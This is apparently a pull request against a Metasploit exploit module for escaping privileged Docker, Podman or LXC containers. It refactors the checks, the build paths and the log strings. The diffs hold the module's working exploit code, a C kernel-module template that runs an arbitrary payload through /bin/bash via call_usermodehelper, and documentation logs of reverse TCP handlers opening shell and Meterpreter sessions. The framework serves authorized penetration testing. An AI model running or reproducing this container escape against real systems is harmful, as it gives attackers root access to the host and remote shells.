### PR TITLE
Pr/collab/18519

### DIFF
--- a/documentation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md
+++ b/documentation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md
@@ -73,10 +73,10 @@ msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check
 msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
 
 [*] [2023.11.07-21:42:40] Started reverse TCP handler on 192.168.56.1:4444 
-[*] [2023.11.07-21:42:42] Creating files
-[*] [2023.11.07-21:42:43] Making kernel module
+[*] [2023.11.07-21:42:42] Creating files...
+[*] [2023.11.07-21:42:43] Compiling the kernel module...
 [+] [2023.11.07-21:42:43] Kernel module compiled successfully
-[*] [2023.11.07-21:42:43] Loading kernel module
+[*] [2023.11.07-21:42:43] Loading kernel module...
 [*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.126:60974) at 2023-11-07 21:42:50 -0500
 [*] This is CredCollect, I have the conn!
 ```
@@ -99,13 +99,12 @@ msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check
 msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
 
 [*] [2023.11.07-21:48:40] Started reverse TCP handler on 192.168.56.1:4444 
-[*] [2023.11.07-21:48:41] Creating files
-[*] [2023.11.07-21:48:43] Making kernel module
+[*] [2023.11.07-21:48:41] Creating files...
+[*] [2023.11.07-21:48:43] Compiling the kernel module...
 [+] [2023.11.07-21:48:44] Kernel module compiled successfully
-[*] [2023.11.07-21:48:44] Loading kernel module
+[*] [2023.11.07-21:48:44] Loading kernel module...
 [*] [2023.11.07-21:48:44] Sending stage (3045380 bytes) to 192.168.56.106
 [*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.106:50402) at 2023-11-07 21:48:45 -0500
 [*] This is CredCollect, I have the conn!
-[!] [2023.11.07-21:48:45] Attempting to delete working directory /tmp/.IvLx
 [*] Session 4 created in the background.
 ```

--- a/modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb
+++ b/modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb
@@ -37,10 +37,6 @@ class MetasploitModule < Msf::Exploit::Local
           'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
           'SessionTypes' => %w[shell meterpreter],
           'DefaultTarget' => 0,
-          'Payload' => {
-            'Space' => 2000,
-            'BadChars' => "\x00"
-          },
           'References' => [
             %w[URL https://www.cybereason.com/blog/container-escape-all-you-need-is-cap-capabilities],
             %w[URL https://github.com/maK-/reverse-shell-access-kernel-module]

--- a/modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb
+++ b/modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb
@@ -85,10 +85,16 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    krelease = kernel_release
     # Check if kernel header folders exist
-    unless directory?("/lib/modules/#{kernel_release}/build")
+    kernel_headers_path = [
+      "/lib/modules/#{krelease}/build",
+      "/usr/src/kernels/#{krelease}"
+    ].find { |path| directory?(path) }
+    unless kernel_headers_path
       fail_with(Failure::NoTarget, 'Kernel headers for this target do not appear to be installed.')
     end
+    vprint_status("Kernel headers found at: #{kernel_headers_path}")
 
     # Check that our required binaries are installed
     unless command_exists?('insmod')
@@ -121,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     # Making exploit
     print_status('Compiling the kernel module...')
-    results = cmd_exec("make -C '#{datastore['WritableContainerDir']}' PWD='#{datastore['WritableContainerDir']}'")
+    results = cmd_exec("make -C '#{datastore['WritableContainerDir']}' KERNEL_DIR='#{kernel_headers_path}' PWD='#{datastore['WritableContainerDir']}'")
     vprint_status('Make results')
     vprint_line(results)
     register_files_for_cleanup([
@@ -144,8 +150,9 @@ class MetasploitModule < Msf::Exploit::Local
     results = cmd_exec("insmod '#{datastore['WritableContainerDir']}/#{datastore['KernelModuleName']}.ko'")
 
     unless results.blank?
-      vprint_status('Insmod results:')
-      vprint_line(results)
+      results = results.strip
+      vprint_status('Insmod results: ' + (results.count("\n") == 0 ? results : ''))
+      vprint_line(results) if results.count("\n") > 0
     end
   end
 
@@ -199,10 +206,11 @@ class MetasploitModule < Msf::Exploit::Local
   def write_makefile(filename)
     file_contents = <<~SOURCE
       obj-m +=#{filename}.o
+
       all:
-      \tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+      \tmake -C $(KERNEL_DIR) M=$(PWD) modules
       clean:
-      \tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
+      \tmake -C $(KERNEL_DIR) M=$(PWD) clean
     SOURCE
     write_file(File.join(datastore['WritableContainerDir'], 'Makefile'), file_contents)
   end

--- a/modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb
+++ b/modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
     register_advanced_options([
-      OptString.new('KernelModuleName', [true, 'The name that the kernel module will be called in the system', rand_text_alpha(8)]),
+      OptString.new('KernelModuleName', [true, 'The name that the kernel module will be called in the system', rand_text_alpha(8)], regex: /^[\w-]+$/),
       OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', "/tmp/.#{rand_text_alpha(4)}"])
     ])
   end
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Local
       end
 
     unless %w[docker podman lxc].include?(container_name.downcase)
-      return Exploit::CheckCode::Unknown('Host does not appear to be container of any kind')
+      return Exploit::CheckCode::Safe('Host does not appear to be container of any kind')
     end
 
     # is root user
@@ -81,23 +81,23 @@ class MetasploitModule < Msf::Exploit::Local
       return Exploit::CheckCode::Safe('SYS_MODULE Capability does not appear to be enabled')
     end
 
+    CheckCode::Vulnerable('Inside Docker container and target appears vulnerable.')
+  end
+
+  def exploit
     # Check if kernel header folders exist
     unless directory?("/lib/modules/#{kernel_release}/build")
-      return Exploit::CheckCode::Unknown("Kernel headers for this target do not appear to be installed. Attempt to install [gcc, make, linux-headers-#{kernel_release}] then retry check")
+      fail_with(Failure::NoTarget, 'Kernel headers for this target do not appear to be installed.')
     end
 
     # Check that our required binaries are installed
     unless command_exists?('insmod')
-      return Exploit::CheckCode::Unknown('insmod does not appear to be installed.')
+      fail_with(Failure::NoTarget, 'insmod does not appear to be installed.')
     end
     unless command_exists?('make')
-      return Exploit::CheckCode::Unknown('make isn\'t installed on the system.')
+      fail_with(Failure::NoTarget, 'make does not appear to be installed.')
     end
 
-    CheckCode::Vulnerable('Inside Docker container and target appears vulnerable')
-  end
-
-  def exploit
     # Check that container directory is writable
     if directory?(datastore['WritableContainerDir']) && !writable?(datastore['WritableContainerDir'])
       fail_with(Failure::BadConfig, "#{datastore['WritableContainerDir']} is not writable")
@@ -108,12 +108,10 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::BadConfig, "#{datastore['KernelModuleName']} is already loaded into the kernel. You may need to remove it manually.")
     end
 
-    original_directory = pwd
-
     # Creating source files
-    print_status('Creating files')
+    print_status('Creating files...')
     mkdir(datastore['WritableContainerDir']) unless directory?(datastore['WritableContainerDir'])
-    cd(datastore['WritableContainerDir'])
+
     write_kernel_source(datastore['KernelModuleName'], payload.encoded)
     write_makefile(datastore['KernelModuleName'])
     register_files_for_cleanup([
@@ -122,8 +120,8 @@ class MetasploitModule < Msf::Exploit::Local
     ].map { |filename| File.join(datastore['WritableContainerDir'], filename) })
 
     # Making exploit
-    print_status('Making kernel module')
-    results = cmd_exec('make')
+    print_status('Compiling the kernel module...')
+    results = cmd_exec("make -C '#{datastore['WritableContainerDir']}' PWD='#{datastore['WritableContainerDir']}'")
     vprint_status('Make results')
     vprint_line(results)
     register_files_for_cleanup([
@@ -136,19 +134,19 @@ class MetasploitModule < Msf::Exploit::Local
     ].map { |filename| File.join(datastore['WritableContainerDir'], filename) })
 
     # Checking if kernel file exists
-    unless file_exist?("#{datastore['KernelModuleName']}.ko")
-      fail_with(Failure::PayloadFailed, 'Kernel file did not compile. Run with verbose to see make errors.')
+    unless file_exist?("#{datastore['WritableContainerDir']}/#{datastore['KernelModuleName']}.ko")
+      fail_with(Failure::PayloadFailed, 'Kernel module did not compile. Run with verbose to see make errors.')
     end
     print_good('Kernel module compiled successfully')
 
     # Loading module and running exploit
-    print_status('Loading kernel module')
-    results = cmd_exec("insmod #{datastore['KernelModuleName']}.ko")
-    vprint_status('Insmod results')
-    vprint_line(results)
+    print_status('Loading kernel module...')
+    results = cmd_exec("insmod '#{datastore['WritableContainerDir']}/#{datastore['KernelModuleName']}.ko'")
 
-    # Leave temporary directory
-    cd(original_directory)
+    unless results.blank?
+      vprint_status('Insmod results:')
+      vprint_line(results)
+    end
   end
 
   def cleanup
@@ -167,45 +165,45 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def write_kernel_source(filename, payload_content)
-    file_content = %^
-#include<linux/init.h>
-#include<linux/module.h>
-#include<linux/kmod.h>
+    file_content = <<~SOURCE
+      #include<linux/init.h>
+      #include<linux/module.h>
+      #include<linux/kmod.h>
 
-MODULE_LICENSE("GPL");
+      MODULE_LICENSE("GPL");
 
-static int start_shell(void){
-#{Rex::Text.to_c(payload_content, Rex::Text::DefaultWrap, 'command')}
-char *argv[] = {"/bin/bash", "-c", command, NULL};
-static char *env[] = {
-"HOME=/",
-"TERM=linux",
-"PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };
-return call_usermodehelper(argv[0], argv, env, UMH_WAIT_EXEC);
-}
+      static int start_shell(void){
+      #{Rex::Text.to_c(payload_content, Rex::Text::DefaultWrap, 'command')}
+      char *argv[] = {"/bin/bash", "-c", command, NULL};
+      static char *env[] = {
+      "HOME=/",
+      "TERM=linux",
+      "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL };
+      return call_usermodehelper(argv[0], argv, env, UMH_WAIT_EXEC);
+      }
 
-static int init_mod(void){
-return start_shell();
-}
-static void exit_mod(void){
+      static int init_mod(void){
+      return start_shell();
+      }
+      static void exit_mod(void){
 
-return;
-}
-module_init(init_mod);
-module_exit(exit_mod);
-^
+      return;
+      }
+      module_init(init_mod);
+      module_exit(exit_mod);
+    SOURCE
     filename = "#{filename}.c" unless filename.end_with?('.c')
     write_file(File.join(datastore['WritableContainerDir'], filename), file_content)
   end
 
   def write_makefile(filename)
-    file_contents = %^
-obj-m +=#{filename}.o
-all:
-\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
-clean:
-\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
-^
+    file_contents = <<~SOURCE
+      obj-m +=#{filename}.o
+      all:
+      \tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+      clean:
+      \tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
+    SOURCE
     write_file(File.join(datastore['WritableContainerDir'], 'Makefile'), file_contents)
   end
 end


### PR DESCRIPTION
This makes some changes to the module based on what I noticed during my testing. Changes include:

* The payload definition is unnecessary and inflated the value that was written to disk so I removed it
* The `KernelModuleName` option now uses a regex so the value will be validated
* Updated the build process so the module does not need to change the current working directory
* Added support for redhat based containers by searching for the kernel headers directory
* Moved checks for exploitability from the `#check` method and into the `#run` method so the module can tell if the target is vulnerable, regardless of if it's exploitable or not
* Changed the verbiage of a few strings to be consistent